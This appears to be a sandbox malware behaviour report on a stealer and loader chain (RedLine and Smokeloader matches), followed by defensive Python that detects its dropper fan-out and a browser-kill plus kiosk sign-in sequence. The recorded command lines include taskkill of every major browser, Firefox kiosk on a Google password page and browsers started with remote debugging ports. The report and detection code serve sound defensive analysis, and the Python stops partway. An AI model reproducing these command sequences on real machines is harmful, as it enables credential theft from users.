Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 0089D64E appears 53 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 0089DF80 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 00897A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 008980C0 appears 133 times
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: String function: 00EE80C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6CBA09D0 appears 215 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6CA49B10 appears 50 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6CA43620 appears 56 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6CBAD930 appears 39 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6CBADAE0 appears 48 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6C9B94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6C9ACBE8 appears 134 times
Source: file.exe, 00000000.00000002.2756268933.0000000023AAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2756268933.0000000023AAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2761290872.000000006CA02000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2762568742.000000006CBF5000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
Source: rhnew[1].exe.22.dr | Static PE information: Section: ZLIB complexity 1.000201798892989
Source: rhnew[1].exe.22.dr | Static PE information: Section: bilyxzuf ZLIB complexity 0.9942948346872154
Source: rhnew.exe.22.dr | Static PE information: Section: ZLIB complexity 1.000201798892989
Source: rhnew.exe.22.dr | Static PE information: Section: bilyxzuf ZLIB complexity 0.9942948346872154
Source: random[1].exe0.22.dr | Static PE information: Section: ZLIB complexity 0.9979009119217082
Source: random[1].exe0.22.dr | Static PE information: Section: madnojdh ZLIB complexity 0.9943187878141483
Source: fc1511c233.exe.22.dr | Static PE information: Section: ZLIB complexity 0.9979009119217082
Source: fc1511c233.exe.22.dr | Static PE information: Section: madnojdh ZLIB complexity 0.9943187878141483
Source: random[2].exe.22.dr | Static PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
Source: 6ae2430bb1.exe.22.dr | Static PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
Source: random[1].exe0.22.dr | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: fc1511c233.exe.22.dr | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@75/75@26/18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2M9851QN.htm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2492234094.000000001D990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2350095249.000000001D975000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247838752.0000000005B3F000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247676352.0000000005B5A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe | ReversingLabs: Detection: 36%
Source: file.exe | Virustotal: Detection: 40%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe"
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe"
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
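The process-creation rows above carry the two behaviours a detection engineer would want to alert on: the Amadey-style fan-out, where skotes.exe in a random Temp folder launches five further executables from numbered Temp subfolders, and the Credential Flusher sequence, where 1b3b76c439.exe force-kills every major browser and then relaunches Firefox in kiosk mode pinned to a Google sign-in page so that the user re-enters a password the co-installed stealer can harvest. The following Python is an added example, not part of the Joe Sandbox report and not code from any of the malware families named in it. It parses the rows above (copied here in the cleaned "Source: ... Process created: ..." form, which is a constructed input) into a process tree and applies both heuristics. The browser list, the sign-in-page markers, the user-writable path set and the count thresholds are assumptions to tune for your own environment; the row regexes are written for this report's layout, not for Sysmon or EDR telemetry.

```python
"""Process-tree heuristics for the dropper fan-out and Credential Flusher rows in this report."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: the process-creation rows from this report, in the cleaned
# "Source: <parent> Process created: <image> <command line>" form. Unresolved rows
# ("unknown unknown") are kept on purpose so the parser is shown tolerating them.
REPORT_ROWS = r'''
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe"
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
'''

ROW_RE = re.compile(r'^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<rest>.*)$')
# The image path is everything up to the first ".exe"; paths may contain spaces.
IMAGE_RE = re.compile(r'^(?P<image>unknown|.+?\.exe)\s*(?P<cmdline>.*)$', re.I)


@dataclass
class Spawn:
    parent: str
    image: str
    cmdline: str


def parse_rows(text):
    """Turn report rows into Spawn records, in report order; skip rows that do not parse."""
    spawns = []
    for line in text.strip().splitlines():
        row = ROW_RE.match(line.strip())
        if not row:
            continue
        img = IMAGE_RE.match(row.group('rest'))
        if img:
            spawns.append(Spawn(row.group('parent'), img.group('image'), img.group('cmdline')))
    return spawns


# Assumed browser set and sign-in markers (tune these; the report only shows Google's page).
BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe', 'opera.exe', 'brave.exe'}
LOGIN_MARKERS = ('accounts.google.com', '/signin', '/login')
TASKKILL_RE = re.compile(r'taskkill\s+/F\s+/IM\s+(\S+)', re.I)
URL_RE = re.compile(r'https?://[^\s"]+', re.I)


def detect_credential_flusher(spawns, min_kills=2):
    """Return {parent: (killed_browsers, kiosk_url)} for parents that force-kill at least
    min_kills browsers and afterwards launch a browser with --kiosk on a sign-in URL."""
    by_parent = defaultdict(list)
    for s in spawns:
        by_parent[s.parent].append(s)
    hits = {}
    for parent, children in by_parent.items():
        killed, kiosk_url = set(), None
        for child in children:                      # children are in creation order
            kill = TASKKILL_RE.search(child.cmdline)
            if kill and kill.group(1).lower() in BROWSERS:
                killed.add(kill.group(1).lower())
                continue
            if '--kiosk' in child.cmdline.lower() and killed:   # kiosk launch after the kills
                url = URL_RE.search(child.cmdline)
                if url and any(mark in url.group(0).lower() for mark in LOGIN_MARKERS):
                    kiosk_url = url.group(0)
        if len(killed) >= min_kills and kiosk_url:
            hits[parent] = (killed, kiosk_url)
    return hits


# Assumed "user-writable" roots and the Temp\<folder>\<name>.exe drop pattern seen in this report.
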